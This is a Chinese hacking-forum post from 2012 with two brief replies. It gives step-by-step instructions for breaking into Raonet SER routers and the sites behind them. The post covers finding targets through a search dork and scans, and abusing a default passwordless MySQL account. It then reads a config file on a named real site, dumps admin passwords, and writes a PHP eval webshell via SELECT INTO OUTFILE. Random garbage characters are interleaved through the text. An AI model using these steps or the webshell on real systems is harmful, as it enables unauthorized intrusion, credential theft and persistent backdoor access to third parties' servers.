找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3029|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
$ T1 R, R+ x* @6 C, O+ i  J
( w9 \9 _1 k$ R# s5 F1:google搜索'Raonet Subscriber Ethernet Router'8 P* u- e% t) G* L: J' o
, M& H( G6 v1 `# j
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
1 O8 n% t' A# v0 J0 Z: k9 |% x) K" _. b$ t/ {
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
! Z4 n# I: A" z3 Q0 x9 d. e" a, u5 y
- E( X$ Q7 p( h& k- W//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
. S5 ?$ |& g. a. d' Q. R1 F$ e+ _2 o3 h0 a, M1 m1 o. x
  Z" [. p  F+ [

1 P8 P% Y( Z4 g: J* G0 G' d# q# Z/ w入侵步骤:6 l7 r' h1 N# m  E' a( m9 {
/ O) R+ P5 e. C6 x
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php7 P3 J& i; g( J6 k8 u2 L6 Q2 |6 z* E

" b* @! U: s3 g% J) L2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc* p! I* }! W! l' d$ }4 s
3:得到密码后连接,查看GUI管理密码:
, h, O' ~8 f# q2 J& y* Guse ser_500- r( R4 G* g/ \8 c( q3 @5 X
select id,passwd from user;8 O) ~9 C& F1 i9 U' T+ o
4:通过数据库写入webshell,执行命令:
$ L( ^) T+ h/ H) b8 s7 |' |! i! @use mysql;
$ v5 Z4 t1 i8 K; }create table ok(cmd TEXT);* f  ~/ W3 O+ m5 P
insert into ok values("<?php @eval($_POST[cmd])?>");. W1 I, a, u! t4 o; V3 |
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
) r( u1 s. ?3 ]( b; {, ]! i8 P0 Jdrop table ok;, k* |) Y; c% h+ Q0 ?9 U

) U$ C& t/ m7 }6 L+ c) r7 b5:连接后门shell.php 1 I5 m2 q- u. y/ n
! g* ?3 x/ {" L/ Q) X
6. 搞定!
6 [" l8 P' S2 x/ f/ \" G1 Y: u3 w! M( y- d% R/ ^. K
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表